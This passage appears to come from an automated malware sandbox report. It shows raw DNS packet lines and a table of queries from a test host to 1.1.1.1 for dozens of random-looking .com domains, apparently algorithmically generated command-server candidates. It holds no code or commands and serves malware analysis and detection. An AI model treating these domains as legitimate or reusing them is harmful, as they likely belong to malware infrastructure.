                                                                                                                                                                                                            Nov 11, 2024 18:25:29.594172955 CET5538853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.595664024 CET5239253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.597062111 CET5891553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.597549915 CET53558621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.597559929 CET5202553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.597712040 CET53532431.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.599651098 CET6270453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.600317955 CET5059653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.603030920 CET53539101.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.604245901 CET53636961.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.604445934 CET5276753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.607948065 CET53553881.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.607959986 CET53520251.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.609925032 CET53589151.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.611752033 CET53567881.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.612086058 CET53627041.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.613607883 CET6546953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.614144087 CET6290553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.614172935 CET53505961.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.615062952 CET5295453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.617650986 CET53523921.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.617661953 CET53527671.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.622005939 CET53654691.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.623109102 CET53529541.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.623790979 CET53629051.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.631076097 CET5703953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.631675005 CET5867153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.631983995 CET5576953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.632461071 CET5586153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.632800102 CET5587553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.643531084 CET53558751.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.644695997 CET53557691.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.645158052 CET53570391.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.646064997 CET53558611.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.667419910 CET53586711.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.672821045 CET5084453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.674236059 CET6392453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.675501108 CET5453453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.680279970 CET5772153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.682423115 CET5132653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.684359074 CET5502353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.685760021 CET53545341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.687930107 CET53577211.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.690896034 CET5650153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.691601038 CET53513261.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.694840908 CET53508441.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.701034069 CET5999753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.719017982 CET53639241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.719042063 CET53550231.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.723556042 CET53565011.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.735529900 CET6016753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.736126900 CET6210053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.737073898 CET4997953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.737402916 CET6522453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.738034964 CET6208853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.738289118 CET5353553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.738607883 CET53599971.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.738789082 CET5266653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.744901896 CET53499791.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.747473001 CET53620881.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.748332024 CET53526661.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.749437094 CET53535351.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.755769968 CET6442053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.756272078 CET6318953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.758027077 CET4958153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.758368015 CET5741453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.758601904 CET5358653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.759037018 CET5891253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.763040066 CET53644201.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.766134977 CET53574141.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.766467094 CET53631891.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.766475916 CET53601671.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.766984940 CET53535861.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.767010927 CET53621001.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.768177032 CET53495811.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.769891977 CET53652241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.774739027 CET6263053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.774920940 CET5036453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.775080919 CET5105153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.775500059 CET5933553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.783243895 CET53593351.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.784375906 CET5066053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.784569025 CET6094153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.784674883 CET53503641.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.786775112 CET6176553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.790766001 CET53589121.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.793289900 CET53506601.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.794457912 CET53609411.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.798182011 CET53617651.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.807352066 CET53626301.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.064414978 CET53510511.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.965285063 CET5216853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.968156099 CET6516653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.969270945 CET5075353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.970442057 CET6081653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.975531101 CET53521681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.979830027 CET53507531.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.981245995 CET53608161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.984575033 CET6064653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.996500015 CET53606461.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.999425888 CET53651661.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.009614944 CET5378353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.014250994 CET5181553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.014503002 CET5626153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.023701906 CET53518151.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.024827957 CET53562611.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.027872086 CET53537831.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.031322002 CET5315953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.033557892 CET6231653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.043342113 CET53623161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.063186884 CET53531591.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.148528099 CET6253253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.158220053 CET53625321.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.172677040 CET6362853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.190310001 CET53636281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.199872971 CET5466153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.209796906 CET53546611.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.197657108 CET5158353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.197657108 CET5362353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198004007 CET5156653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198312044 CET5003453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198354006 CET6526453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198662996 CET5445753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198848963 CET5675853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.199157953 CET5425953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.199181080 CET5724653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.206984997 CET53652641.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.209047079 CET6239653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.209069014 CET5576353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.210999012 CET53544571.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.216191053 CET53623961.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.220237017 CET53557631.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.229105949 CET53515661.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.234344959 CET53572461.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.326090097 CET53536231.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.394615889 CET53542591.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.398926020 CET53500341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.429943085 CET53515831.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.457834005 CET53567581.1.1.1192.168.2.10

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.694881916 CET192.168.2.101.1.1.10x5617Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.695012093 CET192.168.2.101.1.1.10x4077Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.695451021 CET192.168.2.101.1.1.10x9cfbStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.695538044 CET192.168.2.101.1.1.10xd67bStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.721445084 CET192.168.2.101.1.1.10x8ccbStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.728034019 CET192.168.2.101.1.1.10xb263Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.728292942 CET192.168.2.101.1.1.10xed8eStandard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.747172117 CET192.168.2.101.1.1.10x925eStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.749308109 CET192.168.2.101.1.1.10xebdeStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.749546051 CET192.168.2.101.1.1.10x8ae4Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.749892950 CET192.168.2.101.1.1.10x4ce3Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.027956963 CET192.168.2.101.1.1.10xdac2Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.165517092 CET192.168.2.101.1.1.10xab6cStandard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.165891886 CET192.168.2.101.1.1.10xe5f8Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.166106939 CET192.168.2.101.1.1.10x3109Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.215796947 CET192.168.2.101.1.1.10xbbd1Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.226166010 CET192.168.2.101.1.1.10x5bb2Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.226435900 CET192.168.2.101.1.1.10xb4e1Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.226663113 CET192.168.2.101.1.1.10x8f0Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.246527910 CET192.168.2.101.1.1.10xeb18Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.246856928 CET192.168.2.101.1.1.10x4b70Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.247051954 CET192.168.2.101.1.1.10xfce6Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.247203112 CET192.168.2.101.1.1.10xaf76Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.272900105 CET192.168.2.101.1.1.10x2e20Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.273267031 CET192.168.2.101.1.1.10x8cb8Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.279449940 CET192.168.2.101.1.1.10xf81bStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.298640013 CET192.168.2.101.1.1.10x6042Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.299180031 CET192.168.2.101.1.1.10x217cStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.299487114 CET192.168.2.101.1.1.10x7161Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.341470003 CET192.168.2.101.1.1.10x4895Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.359932899 CET192.168.2.101.1.1.10xb7f5Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360095978 CET192.168.2.101.1.1.10x15b5Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360259056 CET192.168.2.101.1.1.10xc593Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360405922 CET192.168.2.101.1.1.10x5af9Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360575914 CET192.168.2.101.1.1.10x31baStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360713959 CET192.168.2.101.1.1.10xcfecStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.498473883 CET192.168.2.101.1.1.10x7e8eStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.533822060 CET192.168.2.101.1.1.10x914fStandard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.537703991 CET192.168.2.101.1.1.10x51c9Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.537878036 CET192.168.2.101.1.1.10xa3f9Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.538043976 CET192.168.2.101.1.1.10xb96cStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.689999104 CET192.168.2.101.1.1.10x68e3Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.690747023 CET192.168.2.101.1.1.10x6926Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.691582918 CET192.168.2.101.1.1.10xde5fStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.692934036 CET192.168.2.101.1.1.10x3cb6Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.694145918 CET192.168.2.101.1.1.10xcfedStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.703248024 CET192.168.2.101.1.1.10x1fc0Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.703685999 CET192.168.2.101.1.1.10xa2c6Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.721549034 CET192.168.2.101.1.1.10x5c9eStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.727751017 CET192.168.2.101.1.1.10xb67dStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.728121996 CET192.168.2.101.1.1.10x9714Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.792912960 CET192.168.2.101.1.1.10xd430Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.802239895 CET192.168.2.101.1.1.10xb022Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.802479029 CET192.168.2.101.1.1.10xf408Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.802581072 CET192.168.2.101.1.1.10x318fStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.809895039 CET192.168.2.101.1.1.10x5c0cStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.810909033 CET192.168.2.101.1.1.10xe4dbStandard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.812875032 CET192.168.2.101.1.1.10x5feStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.814166069 CET192.168.2.101.1.1.10x388fStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.827467918 CET192.168.2.101.1.1.10x4889Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.836296082 CET192.168.2.101.1.1.10xee4Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.931998968 CET192.168.2.101.1.1.10xa45dStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.932085037 CET192.168.2.101.1.1.10x7a1aStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.933690071 CET192.168.2.101.1.1.10x1cfbStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.018100977 CET192.168.2.101.1.1.10x6ebStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.019819021 CET192.168.2.101.1.1.10x4654Standard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.022578001 CET192.168.2.101.1.1.10xe9ddStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.023070097 CET192.168.2.101.1.1.10x2b6aStandard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.025095940 CET192.168.2.101.1.1.10x8cf2Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.025352955 CET192.168.2.101.1.1.10x8773Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.026664972 CET192.168.2.101.1.1.10x132cStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.027328014 CET192.168.2.101.1.1.10x3efaStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.027954102 CET192.168.2.101.1.1.10x8097Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.029300928 CET192.168.2.101.1.1.10x3510Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.030136108 CET192.168.2.101.1.1.10xf944Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.030690908 CET192.168.2.101.1.1.10x23Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031188965 CET192.168.2.101.1.1.10x969cStandard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031656981 CET192.168.2.101.1.1.10xe8a5Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.033529043 CET192.168.2.101.1.1.10x2b49Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.034389973 CET192.168.2.101.1.1.10xb397Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.035085917 CET192.168.2.101.1.1.10xab7bStandard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.036640882 CET192.168.2.101.1.1.10x593aStandard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.049529076 CET192.168.2.101.1.1.10x2d2eStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.081604958 CET192.168.2.101.1.1.10xd055Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.096437931 CET192.168.2.101.1.1.10x5411Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.097062111 CET192.168.2.101.1.1.10x8d41Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.097208023 CET192.168.2.101.1.1.10xe0aeStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.110223055 CET192.168.2.101.1.1.10x8a50Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.110476017 CET192.168.2.101.1.1.10x65d2Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.114918947 CET192.168.2.101.1.1.10xf91fStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.120996952 CET192.168.2.101.1.1.10x2490Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121212959 CET192.168.2.101.1.1.10x6551Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121212959 CET192.168.2.101.1.1.10x2b8bStandard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121375084 CET192.168.2.101.1.1.10xc95bStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
